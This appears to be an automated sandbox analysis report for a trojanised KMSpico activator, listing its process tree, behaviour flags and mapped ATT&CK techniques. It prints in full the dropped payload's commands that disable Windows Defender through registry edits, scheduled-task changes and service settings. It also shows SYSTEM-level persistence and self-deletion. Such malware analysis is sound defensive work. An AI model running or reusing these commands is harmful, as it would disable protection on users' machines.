"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3428 /prefetch:8
2⤵
PID:3784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2952 /prefetch:8
2⤵
PID:1292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,12053593741760566316,2298867074826256705,131072 --disable-databases --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
2⤵
PID:1720

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5468

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:5192

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\KMSpico_Install_v.11.2\" -ad -an -ai#7zMap32209:102:7zEvent9819
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5316

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6088

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\KMSpico_Install_v.11.2\password.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2276

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\KMSpico_Install_v.11.2\KMSpico\" -ad -an -ai#7zMap31239:118:7zEvent2107
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4948

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\KMSpico_Install_v.11.2\" -an -ai#7zMap4685:118:7zEvent19115
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1884

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:32

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\KMSpico_Install_v.11.2\Instruction_SEPTEMBER_2022.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:2476

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\KMSpico_Install_v.11.2\ReadMe KMSpico Install.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:716

C:\Users\Admin\Desktop\KMSpico_Install_v.11.2\KMSPico_Setup.exe
"C:\Users\Admin\Desktop\KMSpico_Install_v.11.2\KMSPico_Setup.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:2484

C:\Users\Admin\kms driver.exe
"C:\Users\Admin\kms driver.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5868

C:\Users\Admin\kmspico_setup.exe
"C:\Users\Admin\kmspico_setup.exe"
2⤵
- Executes dropped EXE
PID:5684

C:\Users\Admin\AppData\Local\Temp\is-7CQ5T.tmp\kmspico_setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7CQ5T.tmp\kmspico_setup.tmp" /SL5="$50380,2952592,69120,C:\Users\Admin\kmspico_setup.exe"
3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies Internet Explorer Phishing Filter
PID:904

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Program Files\KMSpico\scripts\Install_Service.cmd""
4⤵
PID:4568

C:\Windows\system32\sc.exe
sc create "Service KMSELDI" binPath= "C:\Program Files\KMSpico\Service_KMS.exe" type= own error= normal start= auto DisplayName= "Service KMSELDI"
5⤵
- Launches sc.exe
PID:404

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Program Files\KMSpico\scripts\Install_Task.cmd""
4⤵
PID:4984

C:\Windows\system32\schtasks.exe
SCHTASKS /Create /TN "AutoPico Daily Restart" /TR "'C:\Program Files\KMSpico\AutoPico.exe' /silent" /SC DAILY /ST 23:59:59 /RU "NT AUTHORITY\SYSTEM" /RL Highest /F
5⤵
- Creates scheduled task(s)
PID:2772

C:\Program Files\KMSpico\UninsHs.exe
"C:\Program Files\KMSpico\UninsHs.exe" /r0=KMSpico,default,C:\Users\Admin\kmspico_setup.exe
4⤵
- Executes dropped EXE
PID:3644

C:\Program Files\KMSpico\KMSELDI.exe
"C:\Program Files\KMSpico\KMSELDI.exe" /silent /backup
4⤵
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies Control Panel
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5452

C:\Program Files\KMSpico\AutoPico.exe
"C:\Program Files\KMSpico\AutoPico.exe" /silent
4⤵
- Sets file execution options in registry
- Executes dropped EXE
- Modifies Control Panel
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5260

C:\Users\Admin\services.exe
"C:\Users\Admin\services.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:3092

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BF58.tmp\BF59.tmp\BF5A.bat C:\Users\Admin\services.exe"
3⤵
PID:1304

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:3564

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:5632

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
4⤵
PID:3128

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1180

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2500

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5092

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2508

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:5000

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:4080

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:3832

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:396

C:\Windows\system32\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:5612

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:3228

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:5296

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:5936

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:4968

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:752

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:2356

C:\Windows\system32\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:1568

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:3816

C:\Windows\system32\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
4⤵
PID:5524

C:\Windows\system32\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4740

C:\Windows\system32\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:4904

C:\Windows\system32\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
4⤵
PID:620

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:3704

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:1108

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:1000

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:5768

C:\Windows\system32\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
- Modifies security service
PID:5364

C:\Users\Admin\svchost32.exe
"C:\Users\Admin\svchost32.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: AddClipboardFormatListener
PID:2148

C:\Users\Admin\system32.exe
"C:\Users\Admin\system32.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:6128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\system32.exe" & exit
3⤵
PID:3380

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:4892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6128 -s 1600
3⤵
- Program crash
PID:4696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6128 -ip 6128
1⤵
PID:5084

C:\Windows\SECOH-QAD.exe
C:\Windows\SECOH-QAD.exe C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
- Executes dropped EXE
PID:2456

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
2⤵
- Loads dropped DLL
- Modifies data under HKEY_USERS
PID:1300

C:\Program Files\KMSpico\KMSELDI.exe
"C:\Program Files\KMSpico\KMSELDI.exe"
1⤵
- Sets file execution options in registry
- Executes dropped EXE
- Modifies Control Panel
- Modifies data under HKEY_USERS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:116

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f8 0x4b0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2164

C:\Program Files\KMSpico\AutoPico.exe
"C:\Program Files\KMSpico\AutoPico.exe"
1⤵
- Sets file execution options in registry
- Executes dropped EXE
PID:2036

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

T1089

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

System Information Discovery